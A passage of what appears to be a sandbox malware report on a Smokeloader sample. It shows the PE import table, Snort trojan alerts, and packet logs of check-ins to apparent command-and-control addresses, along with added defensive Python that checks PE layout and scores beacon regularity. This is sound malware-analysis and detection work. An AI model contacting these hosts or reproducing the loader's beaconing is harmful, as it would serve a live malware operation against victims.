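    out: Dict[str, Optional[str]] = {}
    for name, (va, size) in directories.items():
        if name == "SECURITY":
            out[name] = None
            continue
        sec = rva_to_section(va)
        # A directory must fit entirely inside the section that holds it.
        if sec is not None and va + size > sec.end:
            raise ValueError(f"{name} spills past the end of {sec.name}")
        out[name] = sec.name if sec else None
    return out


def resources_inside_rsrc(resources=RESOURCES) -> bool:
    """Every resource entry must start and end inside .rsrc."""
    for _rtype, rva, size in resources:
        sec = rva_to_section(rva)
        if sec is None or sec.name != ".rsrc" or rva + size > sec.end:
            return False
    return True


def mostly_uninitialised_sections(sections: List[Section] = SECTIONS, ratio: float = 4.0) -> List[str]:
    """Sections whose VirtualSize exceeds SizeOfRawData by more than `ratio`.

    Such sections are zero-filled by the loader and are a common place for a
    packer or loader stub to unpack code into. For this sample .data is
    0x20338 virtual against 0x600 raw and .ndata has no raw data at all;
    treat the result as a triage hint, not a verdict.
    """
    return [s.name for s in sections if s.raw_size == 0 or s.virtual_size / s.raw_size > ratio]
```

Running `directory_sections()` yields `.rdata` for IMPORT and IAT and `.rsrc` for RESOURCE, matching the report; `resources_inside_rsrc()` also confirms that the six resource entries are laid out back to back inside .rsrc (the RT_ICON at 0x3b190 ends exactly where the first RT_DIALOG at 0x4c1b8 begins).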
DLL | Import
ADVAPI32.dll | RegCreateKeyExW, RegEnumKeyW, RegQueryValueExW, RegSetValueExW, RegCloseKey, RegDeleteValueW, RegDeleteKeyW, AdjustTokenPrivileges, LookupPrivilegeValueW, OpenProcessToken, SetFileSecurityW, RegOpenKeyExW, RegEnumValueW
SHELL32.dll | SHGetSpecialFolderLocation, SHFileOperationW, SHBrowseForFolderW, SHGetPathFromIDListW, ShellExecuteExW, SHGetFileInfoW
ole32.dll | OleInitialize, OleUninitialize, CoCreateInstance, IIDFromString, CoTaskMemFree
COMCTL32.dll | ImageList_Create, ImageList_Destroy, ImageList_AddMasked
USER32.dll | GetClientRect, EndPaint, DrawTextW, IsWindowEnabled, DispatchMessageW, wsprintfA, CharNextA, CharPrevW, MessageBoxIndirectW, GetDlgItemTextW, SetDlgItemTextW, GetSystemMetrics, FillRect, AppendMenuW, TrackPopupMenu, OpenClipboard, SetClipboardData, CloseClipboard, IsWindowVisible, CallWindowProcW, GetMessagePos, CheckDlgButton, LoadCursorW, SetCursor, GetWindowLongW, GetSysColor, SetWindowPos, PeekMessageW, SetClassLongW, GetSystemMenu, EnableMenuItem, GetWindowRect, ScreenToClient, EndDialog, RegisterClassW, SystemParametersInfoW, CreateWindowExW, GetClassInfoW, DialogBoxParamW, CharNextW, ExitWindowsEx, DestroyWindow, CreateDialogParamW, SetTimer, SetWindowTextW, PostQuitMessage, SetForegroundWindow, ShowWindow, wsprintfW, SendMessageTimeoutW, FindWindowExW, IsWindow, GetDlgItem, SetWindowLongW, LoadImageW, GetDC, ReleaseDC, EnableWindow, InvalidateRect, SendMessageW, DefWindowProcW, BeginPaint, EmptyClipboard, CreatePopupMenu
GDI32.dll | SetBkMode, SetBkColor, GetDeviceCaps, CreateFontIndirectW, CreateBrushIndirect, DeleteObject, SetTextColor, SelectObject
KERNEL32.dll | GetExitCodeProcess, WaitForSingleObject, GetModuleHandleA, GetProcAddress, GetSystemDirectoryW, lstrcatW, Sleep, lstrcpyA, WriteFile, GetTempFileNameW, CreateFileW, lstrcmpiA, RemoveDirectoryW, CreateProcessW, CreateDirectoryW, GetLastError, CreateThread, GlobalLock, GlobalUnlock, GetDiskFreeSpaceW, WideCharToMultiByte, lstrcpynW, lstrlenW, SetErrorMode, GetVersion, GetCommandLineW, GetTempPathW, GetWindowsDirectoryW, SetEnvironmentVariableW, ExitProcess, CopyFileW, GetCurrentProcess, GetModuleFileNameW, GetFileSize, GetTickCount, MulDiv, SetFileAttributesW, GetFileAttributesW, SetCurrentDirectoryW, MoveFileW, GetFullPathNameW, GetShortPathNameW, SearchPathW, CompareFileTime, SetFileTime, CloseHandle, lstrcmpiW, lstrcmpW, ExpandEnvironmentStringsW, GlobalFree, GlobalAlloc, GetModuleHandleW, LoadLibraryExW, MoveFileExW, FreeLibrary, WritePrivateProfileStringW, GetPrivateProfileStringW, lstrlenA, MultiByteToWideChar, ReadFile, SetFilePointer, FindClose, FindNextFileW, FindFirstFileW, DeleteFileW
Language of compilation system | Country where language is spoken | Map
English | United States |
Timestamp | Protocol | SID | Message | Source Port | Dest Port | Source IP | Dest IP
05/08/24-16:41:19.549710 | TCP | 2039103 | ET TROJAN Suspected Smokeloader Activity (POST) | 49744 | 80 | 192.168.2.4 | 179.159.229.64
05/08/24-16:41:22.482663 | TCP | 2039103 | ET TROJAN Suspected Smokeloader Activity (POST) | 49747 | 80 | 192.168.2.4 | 179.159.229.64
05/08/24-16:41:03.912735 | TCP | 2039103 | ET TROJAN Suspected Smokeloader Activity (POST) | 49739 | 80 | 192.168.2.4 | 179.159.229.64
05/08/24-16:41:06.812550 | TCP | 2039103 | ET TROJAN Suspected Smokeloader Activity (POST) | 49741 | 80 | 192.168.2.4 | 179.159.229.64
05/08/24-16:41:21.026860 | TCP | 2039103 | ET TROJAN Suspected Smokeloader Activity (POST) | 49745 | 80 | 192.168.2.4 | 179.159.229.64
05/08/24-16:41:25.414325 | TCP | 2039103 | ET TROJAN Suspected Smokeloader Activity (POST) | 49749 | 80 | 192.168.2.4 | 179.159.229.64
05/08/24-16:41:05.348624 | TCP | 2039103 | ET TROJAN Suspected Smokeloader Activity (POST) | 49740 | 80 | 192.168.2.4 | 179.159.229.64
05/08/24-16:41:08.297665 | TCP | 2039103 | ET TROJAN Suspected Smokeloader Activity (POST) | 49742 | 80 | 192.168.2.4 | 179.159.229.64
05/08/24-16:41:23.944554 | TCP | 2039103 | ET TROJAN Suspected Smokeloader Activity (POST) | 49748 | 80 | 192.168.2.4 | 179.159.229.64
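The nine Snort hits above are listed out of order, but once sorted they show the check-in cadence of the loader: eight intervals of which seven are close to 1.46 s, with one 11 s pause in the middle. The Python below is an added example (not part of the Joe Sandbox report) that turns that observation into reusable detection logic: it groups alerts by destination and SID, measures inter-arrival times, and uses the median interval, which a single long pause cannot skew, to score regularity. The alert records are transcribed from the table above; the 10% interval tolerance and 75% regularity threshold are illustrative triage choices of this example, not values from the report or from the ET ruleset.

```python
"""Beacon-interval analysis over the Snort alerts quoted in the report.

Constructed input: the nine records below are transcribed from the report's
Snort table. The tolerance and threshold constants are illustrative choices.
"""
from datetime import datetime
from statistics import median
from typing import Dict, List, Optional, Tuple

MSG = "ET TROJAN Suspected Smokeloader Activity (POST)"

# (timestamp, protocol, sid, message, src_port, dst_port, src_ip, dst_ip), report order.
SNORT_ALERTS = [
    ("05/08/24-16:41:19.549710", "TCP", 2039103, MSG, 49744, 80, "192.168.2.4", "179.159.229.64"),
    ("05/08/24-16:41:22.482663", "TCP", 2039103, MSG, 49747, 80, "192.168.2.4", "179.159.229.64"),
    ("05/08/24-16:41:03.912735", "TCP", 2039103, MSG, 49739, 80, "192.168.2.4", "179.159.229.64"),
    ("05/08/24-16:41:06.812550", "TCP", 2039103, MSG, 49741, 80, "192.168.2.4", "179.159.229.64"),
    ("05/08/24-16:41:21.026860", "TCP", 2039103, MSG, 49745, 80, "192.168.2.4", "179.159.229.64"),
    ("05/08/24-16:41:25.414325", "TCP", 2039103, MSG, 49749, 80, "192.168.2.4", "179.159.229.64"),
    ("05/08/24-16:41:05.348624", "TCP", 2039103, MSG, 49740, 80, "192.168.2.4", "179.159.229.64"),
    ("05/08/24-16:41:08.297665", "TCP", 2039103, MSG, 49742, 80, "192.168.2.4", "179.159.229.64"),
    ("05/08/24-16:41:23.944554", "TCP", 2039103, MSG, 49748, 80, "192.168.2.4", "179.159.229.64"),
]

FlowKey = Tuple[str, int, int]  # (dst_ip, dst_port, sid)


def parse_ts(ts: str) -> datetime:
    """Parse the Snort fast-log timestamp format used in the table, e.g. '05/08/24-16:41:19.549710'."""
    return datetime.strptime(ts, "%m/%d/%y-%H:%M:%S.%f")


def flows_by_destination(alerts=SNORT_ALERTS) -> Dict[FlowKey, List[datetime]]:
    """Group alert times by (dst_ip, dst_port, sid), each group sorted chronologically.

    The report prints the alerts unsorted, so sorting is required before any
    interval can be measured.
    """
    groups: Dict[FlowKey, List[datetime]] = {}
    for ts, _proto, sid, _msg, _sport, dport, _sip, dip in alerts:
        groups.setdefault((dip, dport, sid), []).append(parse_ts(ts))
    for times in groups.values():
        times.sort()
    return groups


def inter_arrival(times: List[datetime]) -> List[float]:
    """Seconds between consecutive alerts."""
    return [(b - a).total_seconds() for a, b in zip(times, times[1:])]


def beacon_score(times: List[datetime], tolerance: float = 0.10) -> Tuple[Optional[float], float]:
    """Return (median interval, fraction of intervals within `tolerance` of the median).

    The median is robust to an isolated long pause (here 11.25 s between the
    fourth and fifth POST), which would drag a mean-based estimate far off.
    """
    deltas = inter_arrival(times)
    if len(deltas) < 2:
        return None, 0.0
    med = median(deltas)
    regular = sum(1 for d in deltas if abs(d - med) <= tolerance * med)
    return med, regular / len(deltas)


def periodic_c2_candidates(alerts=SNORT_ALERTS, min_fraction: float = 0.75) -> List[dict]:
    """Destinations whose alert stream is regular enough to look like C2 polling."""
    out = []
    for (dip, dport, sid), times in flows_by_destination(alerts).items():
        med, frac = beacon_score(times)
        if med is not None and frac >= min_fraction:
            out.append({
                "dst": f"{dip}:{dport}",
                "sid": sid,
                "count": len(times),
                "median_interval_s": round(med, 3),
                "regularity": frac,
            })
    return out


def distinct_source_ports(alerts=SNORT_ALERTS) -> int:
    """Number of distinct client ports. One port per alert means every POST
    opened a fresh TCP connection rather than reusing a keep-alive session."""
    return len({a[4] for a in alerts})
```

On the report's data this yields one candidate, 179.159.229.64:80 under SID 2039103, with nine alerts, a median interval of about 1.467 s and a regularity of 7/8; the nine distinct client ports (49739 through 49749) show that each POST used its own connection, which is what the packet list that follows also shows for ports 49739, 49740 and 49741.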
Timestamp | Source Port | Dest Port | Source IP | Dest IP
May 8, 2024 16:40:10.417942047 CEST | 49731 | 443 | 192.168.2.4 | 104.21.79.229
May 8, 2024 16:40:10.417970896 CEST | 443 | 49731 | 104.21.79.229 | 192.168.2.4
May 8, 2024 16:40:10.418129921 CEST | 49731 | 443 | 192.168.2.4 | 104.21.79.229
May 8, 2024 16:40:10.433727026 CEST | 49731 | 443 | 192.168.2.4 | 104.21.79.229
May 8, 2024 16:40:10.433773994 CEST | 443 | 49731 | 104.21.79.229 | 192.168.2.4
May 8, 2024 16:40:10.775475025 CEST | 443 | 49731 | 104.21.79.229 | 192.168.2.4
May 8, 2024 16:40:10.775563955 CEST | 49731 | 443 | 192.168.2.4 | 104.21.79.229
May 8, 2024 16:40:10.844933987 CEST | 49731 | 443 | 192.168.2.4 | 104.21.79.229
May 8, 2024 16:40:10.844948053 CEST | 443 | 49731 | 104.21.79.229 | 192.168.2.4
May 8, 2024 16:40:10.845236063 CEST | 443 | 49731 | 104.21.79.229 | 192.168.2.4
May 8, 2024 16:40:10.845293045 CEST | 49731 | 443 | 192.168.2.4 | 104.21.79.229
May 8, 2024 16:40:10.849172115 CEST | 49731 | 443 | 192.168.2.4 | 104.21.79.229
May 8, 2024 16:40:10.892119884 CEST | 443 | 49731 | 104.21.79.229 | 192.168.2.4
May 8, 2024 16:40:11.810961962 CEST | 443 | 49731 | 104.21.79.229 | 192.168.2.4
May 8, 2024 16:40:11.811039925 CEST | 49731 | 443 | 192.168.2.4 | 104.21.79.229
May 8, 2024 16:40:11.811054945 CEST | 443 | 49731 | 104.21.79.229 | 192.168.2.4
May 8, 2024 16:40:11.811067104 CEST | 443 | 49731 | 104.21.79.229 | 192.168.2.4
May 8, 2024 16:40:11.811110973 CEST | 49731 | 443 | 192.168.2.4 | 104.21.79.229
May 8, 2024 16:40:11.848439932 CEST | 49731 | 443 | 192.168.2.4 | 104.21.79.229
May 8, 2024 16:40:11.848460913 CEST | 443 | 49731 | 104.21.79.229 | 192.168.2.4
May 8, 2024 16:41:03.562269926 CEST | 49739 | 80 | 192.168.2.4 | 179.159.229.64
May 8, 2024 16:41:03.912379980 CEST | 80 | 49739 | 179.159.229.64 | 192.168.2.4
May 8, 2024 16:41:03.912492037 CEST | 49739 | 80 | 192.168.2.4 | 179.159.229.64
May 8, 2024 16:41:03.912734985 CEST | 49739 | 80 | 192.168.2.4 | 179.159.229.64
May 8, 2024 16:41:03.912771940 CEST | 49739 | 80 | 192.168.2.4 | 179.159.229.64
May 8, 2024 16:41:04.266726017 CEST | 80 | 49739 | 179.159.229.64 | 192.168.2.4
May 8, 2024 16:41:04.977279902 CEST | 80 | 49739 | 179.159.229.64 | 192.168.2.4
May 8, 2024 16:41:04.987595081 CEST | 80 | 49739 | 179.159.229.64 | 192.168.2.4
May 8, 2024 16:41:04.987684965 CEST | 49739 | 80 | 192.168.2.4 | 179.159.229.64
May 8, 2024 16:41:04.988848925 CEST | 49739 | 80 | 192.168.2.4 | 179.159.229.64
May 8, 2024 16:41:04.992517948 CEST | 49740 | 80 | 192.168.2.4 | 179.159.229.64
May 8, 2024 16:41:05.342669010 CEST | 80 | 49739 | 179.159.229.64 | 192.168.2.4
May 8, 2024 16:41:05.348376989 CEST | 80 | 49740 | 179.159.229.64 | 192.168.2.4
May 8, 2024 16:41:05.348449945 CEST | 49740 | 80 | 192.168.2.4 | 179.159.229.64
May 8, 2024 16:41:05.348623991 CEST | 49740 | 80 | 192.168.2.4 | 179.159.229.64
May 8, 2024 16:41:05.348661900 CEST | 49740 | 80 | 192.168.2.4 | 179.159.229.64
May 8, 2024 16:41:05.699552059 CEST | 80 | 49740 | 179.159.229.64 | 192.168.2.4
May 8, 2024 16:41:06.447591066 CEST | 80 | 49740 | 179.159.229.64 | 192.168.2.4
May 8, 2024 16:41:06.447618961 CEST | 80 | 49740 | 179.159.229.64 | 192.168.2.4
May 8, 2024 16:41:06.447824955 CEST | 49740 | 80 | 192.168.2.4 | 179.159.229.64
May 8, 2024 16:41:06.448762894 CEST | 49740 | 80 | 192.168.2.4 | 179.159.229.64
May 8, 2024 16:41:06.451694012 CEST | 49741 | 80 | 192.168.2.4 | 179.159.229.64
May 8, 2024 16:41:06.812247038 CEST | 80 | 49740 | 179.159.229.64 | 192.168.2.4
                                                                                                                                                                                                                                May 8, 2024 16:41:06.812275887 CEST8049741179.159.229.64192.168.2.4
                                                                                                                                                                                                                                May 8, 2024 16:41:06.812400103 CEST4974180192.168.2.4179.159.229.64
                                                                                                                                                                                                                                May 8, 2024 16:41:06.812550068 CEST4974180192.168.2.4179.159.229.64
                                                                                                                                                                                                                                May 8, 2024 16:41:06.812573910 CEST4974180192.168.2.4179.159.229.64
                                                                                                                                                                                                                                May 8, 2024 16:41:07.163414955 CEST8049741179.159.229.64192.168.2.4
                                                                                                                                                                                                                                May 8, 2024 16:41:07.918659925 CEST8049741179.159.229.64192.168.2.4
                                                                                                                                                                                                                                May 8, 2024 16:41:07.923542023 CEST8049741179.159.229.64192.168.2.4
                                                                                                                                                                                                                                May 8, 2024 16:41:07.923702955 CEST4974180192.168.2.4179.159.229.64
                                                                                                                                                                                                                                May 8, 2024 16:41:07.923702955 CEST4974180192.168.2.4179.159.229.64
                                                                                                                                                                                                                                May 8, 2024 16:41:07.926459074 CEST4974280192.168.2.4179.159.229.64
                                                                                                                                                                                                                                May 8, 2024 16:41:08.280407906 CEST8049741179.159.229.64192.168.2.4
                                                                                                                                                                                                                                May 8, 2024 16:41:08.296940088 CEST8049742179.159.229.64192.168.2.4
                                                                                                                                                                                                                                May 8, 2024 16:41:08.297030926 CEST4974280192.168.2.4179.159.229.64
                                                                                                                                                                                                                                May 8, 2024 16:41:08.297665119 CEST4974280192.168.2.4179.159.229.64
                                                                                                                                                                                                                                May 8, 2024 16:41:08.297687054 CEST4974280192.168.2.4179.159.229.64
                                                                                                                                                                                                                                May 8, 2024 16:41:08.652601004 CEST8049742179.159.229.64192.168.2.4
                                                                                                                                                                                                                                May 8, 2024 16:41:09.417098045 CEST8049742179.159.229.64192.168.2.4
                                                                                                                                                                                                                                May 8, 2024 16:41:09.420001984 CEST8049742179.159.229.64192.168.2.4
                                                                                                                                                                                                                                May 8, 2024 16:41:09.420074940 CEST4974280192.168.2.4179.159.229.64
                                                                                                                                                                                                                                May 8, 2024 16:41:09.420120001 CEST4974280192.168.2.4179.159.229.64
                                                                                                                                                                                                                                May 8, 2024 16:41:09.773686886 CEST8049742179.159.229.64192.168.2.4
                                                                                                                                                                                                                                May 8, 2024 16:41:10.450011015 CEST49743443192.168.2.465.108.69.93
                                                                                                                                                                                                                                May 8, 2024 16:41:10.450052023 CEST4434974365.108.69.93192.168.2.4
                                                                                                                                                                                                                                May 8, 2024 16:41:10.450210094 CEST49743443192.168.2.465.108.69.93
                                                                                                                                                                                                                                May 8, 2024 16:41:10.450504065 CEST49743443192.168.2.465.108.69.93
                                                                                                                                                                                                                                May 8, 2024 16:41:10.450512886 CEST4434974365.108.69.93192.168.2.4
                                                                                                                                                                                                                                May 8, 2024 16:41:11.118464947 CEST4434974365.108.69.93192.168.2.4
                                                                                                                                                                                                                                May 8, 2024 16:41:11.118597984 CEST49743443192.168.2.465.108.69.93
                                                                                                                                                                                                                                May 8, 2024 16:41:11.120217085 CEST49743443192.168.2.465.108.69.93
                                                                                                                                                                                                                                May 8, 2024 16:41:11.120229006 CEST4434974365.108.69.93192.168.2.4
                                                                                                                                                                                                                                May 8, 2024 16:41:11.120506048 CEST4434974365.108.69.93192.168.2.4
                                                                                                                                                                                                                                May 8, 2024 16:41:11.131782055 CEST49743443192.168.2.465.108.69.93
                                                                                                                                                                                                                                May 8, 2024 16:41:11.176116943 CEST4434974365.108.69.93192.168.2.4
                                                                                                                                                                                                                                May 8, 2024 16:41:11.821814060 CEST4434974365.108.69.93192.168.2.4
                                                                                                                                                                                                                                May 8, 2024 16:41:11.874836922 CEST49743443192.168.2.465.108.69.93
                                                                                                                                                                                                                                May 8, 2024 16:41:11.874861956 CEST4434974365.108.69.93192.168.2.4
                                                                                                                                                                                                                                May 8, 2024 16:41:11.921852112 CEST49743443192.168.2.465.108.69.93
                                                                                                                                                                                                                                May 8, 2024 16:41:12.150841951 CEST4434974365.108.69.93192.168.2.4
                                                                                                                                                                                                                                May 8, 2024 16:41:12.150855064 CEST4434974365.108.69.93192.168.2.4
                                                                                                                                                                                                                                May 8, 2024 16:41:12.150906086 CEST4434974365.108.69.93192.168.2.4
                                                                                                                                                                                                                                May 8, 2024 16:41:12.150923967 CEST4434974365.108.69.93192.168.2.4
                                                                                                                                                                                                                                May 8, 2024 16:41:12.150937080 CEST4434974365.108.69.93192.168.2.4
                                                                                                                                                                                                                                May 8, 2024 16:41:12.151087046 CEST49743443192.168.2.465.108.69.93
                                                                                                                                                                                                                                May 8, 2024 16:41:12.151087046 CEST49743443192.168.2.465.108.69.93
                                                                                                                                                                                                                                May 8, 2024 16:41:12.151110888 CEST4434974365.108.69.93192.168.2.4
                                                                                                                                                                                                                                May 8, 2024 16:41:12.151417971 CEST4434974365.108.69.93192.168.2.4
                                                                                                                                                                                                                                May 8, 2024 16:41:12.151427031 CEST4434974365.108.69.93192.168.2.4
                                                                                                                                                                                                                                May 8, 2024 16:41:12.151438951 CEST4434974365.108.69.93192.168.2.4
                                                                                                                                                                                                                                May 8, 2024 16:41:12.151453018 CEST4434974365.108.69.93192.168.2.4
                                                                                                                                                                                                                                May 8, 2024 16:41:12.151493073 CEST49743443192.168.2.465.108.69.93
                                                                                                                                                                                                                                May 8, 2024 16:41:12.151503086 CEST4434974365.108.69.93192.168.2.4
                                                                                                                                                                                                                                May 8, 2024 16:41:12.151520014 CEST49743443192.168.2.465.108.69.93
                                                                                                                                                                                                                                May 8, 2024 16:41:12.218633890 CEST49743443192.168.2.465.108.69.93
                                                                                                                                                                                                                                May 8, 2024 16:41:12.479877949 CEST4434974365.108.69.93192.168.2.4
                                                                                                                                                                                                                                May 8, 2024 16:41:12.479890108 CEST4434974365.108.69.93192.168.2.4
                                                                                                                                                                                                                                May 8, 2024 16:41:12.479935884 CEST4434974365.108.69.93192.168.2.4
                                                                                                                                                                                                                                May 8, 2024 16:41:12.479949951 CEST4434974365.108.69.93192.168.2.4
                                                                                                                                                                                                                                May 8, 2024 16:41:12.479969025 CEST49743443192.168.2.465.108.69.93
                                                                                                                                                                                                                                May 8, 2024 16:41:12.479991913 CEST4434974365.108.69.93192.168.2.4
                                                                                                                                                                                                                                May 8, 2024 16:41:12.480011940 CEST49743443192.168.2.465.108.69.93
                                                                                                                                                                                                                                May 8, 2024 16:41:12.480045080 CEST49743443192.168.2.465.108.69.93
                                                                                                                                                                                                                                May 8, 2024 16:41:12.480815887 CEST4434974365.108.69.93192.168.2.4
                                                                                                                                                                                                                                May 8, 2024 16:41:12.480823040 CEST4434974365.108.69.93192.168.2.4
                                                                                                                                                                                                                                May 8, 2024 16:41:12.480849981 CEST4434974365.108.69.93192.168.2.4
                                                                                                                                                                                                                                May 8, 2024 16:41:12.480880022 CEST49743443192.168.2.465.108.69.93
                                                                                                                                                                                                                                May 8, 2024 16:41:12.480889082 CEST4434974365.108.69.93192.168.2.4
                                                                                                                                                                                                                                May 8, 2024 16:41:12.480912924 CEST4434974365.108.69.93192.168.2.4
                                                                                                                                                                                                                                May 8, 2024 16:41:12.480912924 CEST49743443192.168.2.465.108.69.93
                                                                                                                                                                                                                                May 8, 2024 16:41:12.480948925 CEST49743443192.168.2.465.108.69.93
                                                                                                                                                                                                                                May 8, 2024 16:41:12.481594086 CEST4434974365.108.69.93192.168.2.4
                                                                                                                                                                                                                                May 8, 2024 16:41:12.481616974 CEST4434974365.108.69.93192.168.2.4
                                                                                                                                                                                                                                May 8, 2024 16:41:12.481651068 CEST49743443192.168.2.465.108.69.93
                                                                                                                                                                                                                                May 8, 2024 16:41:12.481657028 CEST4434974365.108.69.93192.168.2.4
                                                                                                                                                                                                                                May 8, 2024 16:41:12.481679916 CEST49743443192.168.2.465.108.69.93
                                                                                                                                                                                                                                May 8, 2024 16:41:12.481702089 CEST49743443192.168.2.465.108.69.93
                                                                                                                                                                                                                                May 8, 2024 16:41:12.808851957 CEST4434974365.108.69.93192.168.2.4
                                                                                                                                                                                                                                May 8, 2024 16:41:12.808875084 CEST4434974365.108.69.93192.168.2.4
                                                                                                                                                                                                                                May 8, 2024 16:41:12.809077024 CEST49743443192.168.2.465.108.69.93
                                                                                                                                                                                                                                May 8, 2024 16:41:12.809106112 CEST4434974365.108.69.93192.168.2.4
                                                                                                                                                                                                                                May 8, 2024 16:41:12.809158087 CEST49743443192.168.2.465.108.69.93
                                                                                                                                                                                                                                May 8, 2024 16:41:12.809483051 CEST4434974365.108.69.93192.168.2.4
                                                                                                                                                                                                                                May 8, 2024 16:41:12.809499025 CEST4434974365.108.69.93192.168.2.4
                                                                                                                                                                                                                                May 8, 2024 16:41:12.809550047 CEST49743443192.168.2.465.108.69.93
                                                                                                                                                                                                                                May 8, 2024 16:41:12.809556961 CEST4434974365.108.69.93192.168.2.4
                                                                                                                                                                                                                                May 8, 2024 16:41:12.809600115 CEST49743443192.168.2.465.108.69.93
                                                                                                                                                                                                                                May 8, 2024 16:41:12.810208082 CEST4434974365.108.69.93192.168.2.4
                                                                                                                                                                                                                                May 8, 2024 16:41:12.810230970 CEST4434974365.108.69.93192.168.2.4
                                                                                                                                                                                                                                May 8, 2024 16:41:12.810266018 CEST49743443192.168.2.465.108.69.93
                                                                                                                                                                                                                                May 8, 2024 16:41:12.810271025 CEST4434974365.108.69.93192.168.2.4
                                                                                                                                                                                                                                May 8, 2024 16:41:12.810311079 CEST49743443192.168.2.465.108.69.93
                                                                                                                                                                                                                                May 8, 2024 16:41:12.810347080 CEST49743443192.168.2.465.108.69.93
                                                                                                                                                                                                                                May 8, 2024 16:41:12.810349941 CEST4434974365.108.69.93192.168.2.4
                                                                                                                                                                                                                                May 8, 2024 16:41:12.811288118 CEST4434974365.108.69.93192.168.2.4
                                                                                                                                                                                                                                May 8, 2024 16:41:12.811311007 CEST4434974365.108.69.93192.168.2.4
                                                                                                                                                                                                                                May 8, 2024 16:41:12.811346054 CEST49743443192.168.2.465.108.69.93
                                                                                                                                                                                                                                May 8, 2024 16:41:12.811352015 CEST4434974365.108.69.93192.168.2.4
                                                                                                                                                                                                                                May 8, 2024 16:41:13.474059105 CEST49743443192.168.2.465.108.69.93
                                                                                                                                                                                                                                May 8, 2024 16:41:13.474076986 CEST49743443192.168.2.465.108.69.93
                                                                                                                                                                                                                                May 8, 2024 16:41:13.474642038 CEST4434974365.108.69.93192.168.2.4
                                                                                                                                                                                                                                May 8, 2024 16:41:13.474657059 CEST4434974365.108.69.93192.168.2.4
                                                                                                                                                                                                                                May 8, 2024 16:41:13.474700928 CEST49743443192.168.2.465.108.69.93
                                                                                                                                                                                                                                May 8, 2024 16:41:13.474706888 CEST4434974365.108.69.93192.168.2.4
                                                                                                                                                                                                                                May 8, 2024 16:41:13.474742889 CEST49743443192.168.2.465.108.69.93
                                                                                                                                                                                                                                May 8, 2024 16:41:13.474756956 CEST49743443192.168.2.465.108.69.93
                                                                                                                                                                                                                                May 8, 2024 16:41:13.475572109 CEST4434974365.108.69.93192.168.2.4
                                                                                                                                                                                                                                May 8, 2024 16:41:13.475589037 CEST4434974365.108.69.93192.168.2.4
                                                                                                                                                                                                                                May 8, 2024 16:41:13.475661993 CEST49743443192.168.2.465.108.69.93
                                                                                                                                                                                                                                May 8, 2024 16:41:13.475667000 CEST4434974365.108.69.93192.168.2.4
                                                                                                                                                                                                                                May 8, 2024 16:41:13.475697994 CEST49743443192.168.2.465.108.69.93
                                                                                                                                                                                                                                May 8, 2024 16:41:13.475717068 CEST49743443192.168.2.465.108.69.93
                                                                                                                                                                                                                                May 8, 2024 16:41:13.476346016 CEST4434974365.108.69.93192.168.2.4
                                                                                                                                                                                                                                May 8, 2024 16:41:13.476363897 CEST4434974365.108.69.93192.168.2.4
                                                                                                                                                                                                                                May 8, 2024 16:41:13.476421118 CEST49743443192.168.2.465.108.69.93
                                                                                                                                                                                                                                May 8, 2024 16:41:13.476425886 CEST4434974365.108.69.93192.168.2.4
                                                                                                                                                                                                                                May 8, 2024 16:41:13.476457119 CEST49743443192.168.2.465.108.69.93
                                                                                                                                                                                                                                May 8, 2024 16:41:13.476470947 CEST49743443192.168.2.465.108.69.93
                                                                                                                                                                                                                                May 8, 2024 16:41:13.477339029 CEST4434974365.108.69.93192.168.2.4
                                                                                                                                                                                                                                May 8, 2024 16:41:13.477359056 CEST4434974365.108.69.93192.168.2.4
                                                                                                                                                                                                                                May 8, 2024 16:41:13.477425098 CEST49743443192.168.2.465.108.69.93
                                                                                                                                                                                                                                May 8, 2024 16:41:13.477431059 CEST4434974365.108.69.93192.168.2.4
                                                                                                                                                                                                                                May 8, 2024 16:41:13.477473021 CEST49743443192.168.2.465.108.69.93
                                                                                                                                                                                                                                May 8, 2024 16:41:13.478266954 CEST4434974365.108.69.93192.168.2.4
                                                                                                                                                                                                                                May 8, 2024 16:41:13.478296995 CEST4434974365.108.69.93192.168.2.4
                                                                                                                                                                                                                                May 8, 2024 16:41:13.478343010 CEST49743443192.168.2.465.108.69.93
                                                                                                                                                                                                                                May 8, 2024 16:41:13.478351116 CEST4434974365.108.69.93192.168.2.4
                                                                                                                                                                                                                                May 8, 2024 16:41:13.478389025 CEST49743443192.168.2.465.108.69.93
                                                                                                                                                                                                                                May 8, 2024 16:41:13.478404999 CEST49743443192.168.2.465.108.69.93
                                                                                                                                                                                                                                May 8, 2024 16:41:13.478815079 CEST4434974365.108.69.93192.168.2.4
                                                                                                                                                                                                                                May 8, 2024 16:41:13.478832006 CEST4434974365.108.69.93192.168.2.4
                                                                                                                                                                                                                                May 8, 2024 16:41:13.478899956 CEST49743443192.168.2.465.108.69.93
                                                                                                                                                                                                                                May 8, 2024 16:41:13.478909016 CEST4434974365.108.69.93192.168.2.4
                                                                                                                                                                                                                                May 8, 2024 16:41:13.478948116 CEST49743443192.168.2.465.108.69.93
                                                                                                                                                                                                                                May 8, 2024 16:41:13.479538918 CEST4434974365.108.69.93192.168.2.4
                                                                                                                                                                                                                                May 8, 2024 16:41:13.479562044 CEST4434974365.108.69.93192.168.2.4
                                                                                                                                                                                                                                May 8, 2024 16:41:13.479609013 CEST49743443192.168.2.465.108.69.93
                                                                                                                                                                                                                                May 8, 2024 16:41:13.479614973 CEST4434974365.108.69.93192.168.2.4
                                                                                                                                                                                                                                May 8, 2024 16:41:13.479643106 CEST49743443192.168.2.465.108.69.93
                                                                                                                                                                                                                                May 8, 2024 16:41:13.479655981 CEST49743443192.168.2.465.108.69.93
                                                                                                                                                                                                                                May 8, 2024 16:41:13.480622053 CEST4434974365.108.69.93192.168.2.4
                                                                                                                                                                                                                                May 8, 2024 16:41:13.480638027 CEST4434974365.108.69.93192.168.2.4
                                                                                                                                                                                                                                May 8, 2024 16:41:13.480721951 CEST49743443192.168.2.465.108.69.93
                                                                                                                                                                                                                                May 8, 2024 16:41:13.480730057 CEST4434974365.108.69.93192.168.2.4
                                                                                                                                                                                                                                May 8, 2024 16:41:13.480768919 CEST49743443192.168.2.465.108.69.93
                                                                                                                                                                                                                                May 8, 2024 16:41:13.481302023 CEST4434974365.108.69.93192.168.2.4
                                                                                                                                                                                                                                May 8, 2024 16:41:13.481317043 CEST4434974365.108.69.93192.168.2.4
                                                                                                                                                                                                                                May 8, 2024 16:41:13.481380939 CEST49743443192.168.2.465.108.69.93
                                                                                                                                                                                                                                May 8, 2024 16:41:13.481388092 CEST4434974365.108.69.93192.168.2.4
                                                                                                                                                                                                                                May 8, 2024 16:41:13.481429100 CEST49743443192.168.2.465.108.69.93
                                                                                                                                                                                                                                May 8, 2024 16:41:13.481910944 CEST4434974365.108.69.93192.168.2.4
